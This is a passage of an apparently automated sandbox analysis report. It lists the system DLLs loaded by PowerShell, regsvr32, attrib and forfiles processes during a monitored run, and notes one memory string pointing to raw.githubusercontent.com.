Source: powershell.exe, 00000006.00000002.2569213401.00000276803D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.comX |
Source: C:\Windows\System32\loaddll64.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Windows\System32\loaddll64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Section loaded: aclayers.dll | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc_os.dll | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll | |
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll | |
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll | |
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll | |
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll | |
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll | |
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll | |
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll | |
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | |
